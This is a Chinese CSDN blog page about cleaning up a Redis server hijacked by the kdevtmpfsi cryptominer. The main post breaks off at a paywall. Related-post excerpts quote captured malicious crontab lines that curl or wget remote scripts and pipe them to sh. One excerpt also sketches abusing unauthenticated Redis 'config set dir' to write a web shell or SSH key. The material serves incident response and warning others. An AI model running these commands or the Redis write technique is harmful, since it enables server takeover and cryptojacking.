记一次Redis被入侵(被黑)处理过程

最新推荐文章于 2024-10-16 10:22:42 发布
最新推荐文章于 2024-10-16 10:22:42 发布
阅读量3.7k 收藏 9
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: redis 攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/aimashi620/article/details/103905329
本文描述了一次服务器遭遇黑客入侵并被用于挖矿的事件,详细记录了从发现异常、排查到最终解决问题的过程。作者通过top命令发现异常进程,kill命令暂时消除威胁,最终通过加固Redis服务和调整安全组策略彻底解决问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

通常作为一名后端程序员,并没有系统的学习过关于服务器安防相关的知识,遇到服务器被黑的情况往往比较迷茫,不知道从何下手。服务器可能遭受的攻击多种多样,以下主要讲述的是我本次遇到的一次服务器被黑客拿来当矿机的处理过程。

攻击的发现

之所以发现服务器被攻击了是因为有用户反馈系统卡顿非常严重,我知道一般用户反馈描述的那个时间点不应该会有这么高的延迟的,所以就登录服务器查看以下CPU等资源的消耗情况。(挖矿非常消耗CPU性能)

处理步骤

  1. 首先登录服务器,使用‘top’命令查看以下资源的消耗情况(不知道每一列的含义百度一下就好了),看到有一个进程id为15437的进程它消耗了200%的cpu,而且这个进程很陌生,所以非常可疑。
    在这里插入图片描述

  2. 由于确定这个进程不是我系统服务所需的进程,所以可以使用‘kill -9’命令把它杀掉(例如上一步已知进程id为15437,所以kill -9 15437),杀掉之后我以为大患已除,但没过多久(还不到一分钟)我再次使用top命令查看,发现这个进程又重新起来了(新起了一个进程,进程id变了,但还是那个叫kdevtmpfsi的程序)。照这样看来被我杀死的那个进程应该是有一个父进程的,这个父进程在我杀死这个子进程后又重新把这个子进程拉起。

  3. 使用以下命令可以查看它的父进程id,第三列就是。

ps -ef | grep 'kdevtmpfsi'

在这里插入图片描述
4. 知道了父进程的

最低0.47元/天 解锁文章

200万优质内容无限畅学
本文通过实例介绍了Redis的基础知识、数据类型、数据结构以及典型应用场景 值得一看!
AI天才研究院
08-06 1573
2017年,Redis是基于MIT许可发布的一个开源的高性能键值数据库,其开发语言为C语言。它提供了多种数据类型(strings、hashes、lists、sets、sorted sets等),分布式支持(可横向扩展),内存存储,持久化功能,事务处理功能等。作为一种高性能的键值数据库,Redis在处理海量数据时表现优异。在本篇文章中,我将会从Redis的一些基础知识入手,介绍Redis中的几个重要概念、数据类型、数据结构以及应用场景。希望能够帮助读者快速理解Redis的核心知识。
redis 布隆过滤器 BloomFilter
最新发布
m0_37843156的博客
01-19 1944
文章目录1、什么是布隆过滤器?1.1工作原理1.2布隆过滤器的优点1.3缺点2、布隆过滤器的使用场景3、布隆过滤器的原理3.1布隆过滤器的数据结构3.2初始化阶3.3插入元素过程3.4查询元素是否存在3.5元素删除3.6扩容4、SpringBoot整合布隆过滤器4.1技术选型4.2依赖4.3配置布隆过滤器相关参数4.4布隆过滤器工具类4.5业务操作。
Redis的初步搭建及被入侵经历
dobat的博客
05-31 3949
越来越觉得Redis的火热,同时日常开发中迫切需要用到,所以赶紧来充充电吧。网上非常详细的介绍了Redis的来源、特点、数据结构、应用场景等。在这里仅以一个新接触的入门者来自我总结下,Redis可以理解为以内存作为数据存储介质,因此读写效率极高,相比较于传统的关系数据库,如Mysql,非常适合存储读取频繁使用的数据。同时实现了持久化,不用担心数据丢失,支持多种数据结构,主从模式、配置集群什么的当然...
一次Redis攻击的事件
weixin_33816946的博客
11-12 768
最近几个月非常忙,所以很少有时间写博客,这几天终于闲了一些,于是就在整理平时的一些笔。恰好这几天Redis服务器发生了问题,就录一下。 我司有两款分别是2B和2C的App,类似于阿里旺旺的卖家版和买家版,里面有一个聊天的功能模块。双方可以通过这个功能聊天。内部通讯使用了环信,只是将本地账号和环信账号进行了关联。其他的信息,比如用户基本信息,好友关系,群组关系等存在Redis中,为防止Redi...
redis入侵
程序员陆通
02-12 1536
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
录第一次云服务器redis
m0_73520938的博客
04-24 795
redis里莫名奇妙被写入四个键值对,backup1,backup2,backup3,backup4,内容是奇奇怪怪的sh脚本:*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh。施展百度大法后发现原来被挖矿了.....(redis明明设置了密码.....)解决办法:设置更复杂的redis连接密码,安全组,防火墙。
一次云服务器因redis漏洞被
m0_46435741的博客
11-21 1994
您所使用的设备(IP:***)存在对其他服务器端口(TCP:6379)的攻击行为 大晚上的,在床上躺着,突然腾讯云给我发个消息和邮件,如下: 吓我一跳,定睛一看,端口6379,不是radis的默认端口吗?前些阵子写项目就用自己的服务器搭了一个radis服务器,不会被了吧?百般纳闷,反正说是24小时内,不管,先睡觉 早上爬起来,想用Xshell登录一下服务器看看,结果死活登不上,再在控制台看看,结果还是登不上,心想:完了,不会真被了吧?用腾讯云自动实例检测,提示CPU近期占有率高达92%,但是我在服务
一次腾讯云centos服务器被入侵的处理
a18131120314的博客
08-31 1105
  昨天一大早,我还没到公司呢,就收到腾讯云安全中心发来的服务器异常登录告警,登录控制台一看,ip还是美国的,一脸懵逼。由于本人之前也没有过处理服务器入侵的经验,而且这台服务器目前还没有部署商用系统,所以也就没怎么在意,照着云安全中心提示的可疑文件的位置,将其删除,就这样交差了。其实我知道这样肯定是不行的,但是确实很烦去处理这种事情。果然,下午又收到了告警。这是公司的电脑,老板很在意,刚...
阿里面试:如何解决Redis热点Key问题?
架构师尼恩
10-16 1957
在某个Key接收到的访问次数、显著高于其它Key时,我们可以将其称之为HotKey/热key。某Redis实例的每秒总访问量为10000,而其中一个Key的每秒访问量达到了7000(访问次数显著高于其它Key)对一个拥有上千个成员且总大小为1MB的HASH Key每秒发送大量的HGETALL(带宽占用显著高于其它Key)对一个拥有数万个成员的ZSET Key每秒发送大量的ZRANGE(CPU时间占用显著高于其它Key)1 、MySQL等数据库会被频繁访问的热数据如爆款商品的skuId。
redis受到攻击
weixin_40083227的博客
05-03 521
今天被挖矿软件不小心植入脚本了,导致云服务器100%的CPU占用,被迫当肉鸡。原因是redis的默认端口没有改,也没有密码,就被攻击。 解决方法是 sudo kill -9 10053 && sudo userdel redis 必须要同时执行,这个脚本会自动唤醒,删除redis用户后,找到异常的脚本文件删除掉。然后卸载redis,sudo apt remove redis ...
【Linux】云服务器的Redis
m0_62645012的博客
02-28 1318
重装完系统,因为学习的需要需要下载apache mysql 和 redis ,就在这个时候我突然意识到会不会是redis 的问题,因为最近才学到redis,在云服务器被入侵的前几天才安装的redis。我就登录腾讯云网页开始查看主机情况,发现主机是开着的,但就是ssh登录不进去,怀疑密码被改了,我就开始通过腾讯云修改密码,修改后可以登录。因为方便本地使用连接测试,就关闭了防火墙,开发了6379端口与所有ip都可以访问。这几天开学没咋注意短信,周一才发现腾讯云服务器被入侵,我就开始登录处理,结果发现无法登录。
录一下网站被的过程
udbwxf的博客
11-15 676
Thinkphp网站被 昨天回老家参加奶奶的葬礼,结果同事说公司网站被了,点击网站后会被带到一个游戏网站。 今天回到公司,检查了一下日志,发现客利用了thinkphp的sql注入漏洞。 整个过程如下: 通过注入获得后台用户名和密码。日志录为: 114.103.41.116 - - [11/Nov/2019:01:25:52 +0800] “GET /index.php/Hom...
线上redis 服务器被恶意清空(被
学无止境
09-26 88
查看定时任务时发现有些任务在执行,看这名字就觉得不像好东西 crontab -l image.png 进入定时任务log 进行查看 cd /var/log image.png 打开一个最近的看看 image.png 看看,从一个陌生网站下载sh 脚本执行,这个ip 还是美国的。 打开看了看,看不太懂。。。 看了下 var/log 下的secure-20190901 日志...
一次数据库被的过程
热门推荐
qq_42087460的博客
03-26 1万+
最近在做自己的网站,准备自己搞点好玩的东西,在自己服务器上搭建了mysql数据库。 昨天下班回去准备撸代码的时候,发现数据库连不上了, 用navicat也打不开,什么情况!难道数据库挂了? 赶紧去服务器检查了一下数据库状态,没问题啊,在运行呢! 奇怪了。 登录看一下,哦吼,进不去,mysql -uroot -p 死活进不去,这是神马情况!!没得办法了,只能后台操作了。 先停掉数据库 service mysql stop 编辑mysql 配置文件 vi /etc/my.cnf 在配置
Redis配置错误导致主机被
若鱼的专栏
04-16 1707
现象以及如何处理参考:http://blog.51cto.com/hld1992/2047658公司有台做voip的服务器最近CPU总是跑满,这机器自从交给厂家搭好环境后基本就没怎么管它,于是进去查看进程,top了下(见下图)这个叫wnTKYg的进程很诡异,已经把CPU吃光了,上网一查,原来是中了挖矿的马。(啊,我的天。这只是一个单核1G内存的阿里云主机)既然被入侵了,那就得干掉它,下面是解决过程...
服务器被,帮凶竟然是Redis
HouXinLin_优快云的博客
06-03 757
一、经过 就在昨天,我像往常一样连接到一台云服务器中的Redis进行学习,当我执行keys *查看所有键的时候,却发现返回了(empty array),也就是代表没有任何数据在Redis中,可是Redis我也并没有手动停止过(没配置过持久化,也就是重启后数据就会消失),也保证没有执行过flushdb清空数据,可数据怎么就没了呢?这让我很是好奇。 这没理由啊,后来在我的/usr/app目录下发现了一个readme.txt。 我得我并没有创建过这个文件,于是通过vim打开他,此时我一脸小朋友问号。 让
利用Redis配置漏洞进linux服务器(被一次,特出此警告贴)
weixin_43783160的博客
11-24 539
参考博客: http://www.zhoulingjie.com/archives/1140 漏洞描述 1、借助 redis 内置命令,可以对现有数据进行恶意清空 2、 如果 redis 以root身份运行,可往服务器上写入SSH公钥文件,直接登录服务器 漏洞原理 如果redis端口对外网开放,且未配置安全密码访问(或泄露); 当 redis 以root用户身份运行时,就可以借助链接到redis,通过redis内置命令修改 dir和 dbfilename 从而可往服务器的任何位置写入任何内容的文件,当
Redis入侵小结
LIVE
02-26 354
如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:   开启redis客户端   输入以下命令来连接远程redis   redis-cli -h 125.39.185.150 -p 6379   接下来,在远程redis内存中设置数据:   config set dir /var/www/html(在内存中设置切换的web目录/var/www/html) ...
安装redis后,系统异常,被攻击入侵
BecauseOfYouIKnew的博客
03-22 2822
如果你的系统在安装redis后,同时在使用默认redis配置文件的情况下,系统发生异常,那你就应该去查看你的/root/.ssh/authorized_keys的文件,如果出现类似代码:说明你的系统被客通过redis入侵了,`REDIS0006þ^@^@^GcrackitA<90>ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDao4L1Hk/El05qbO5NeBA
Suricata-Redis: 利用Redis录处理Suricata事件
资源摘要信息:"Suricata-Redis 是一个项目,其核心概念是在 Redis(一种流行的高性能的 noSQL 数据库)中录和处理 Suricata 产生的安全事件。Suricata 是一个开源的网络威胁检测引擎,能够执行实时的流量分析、...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值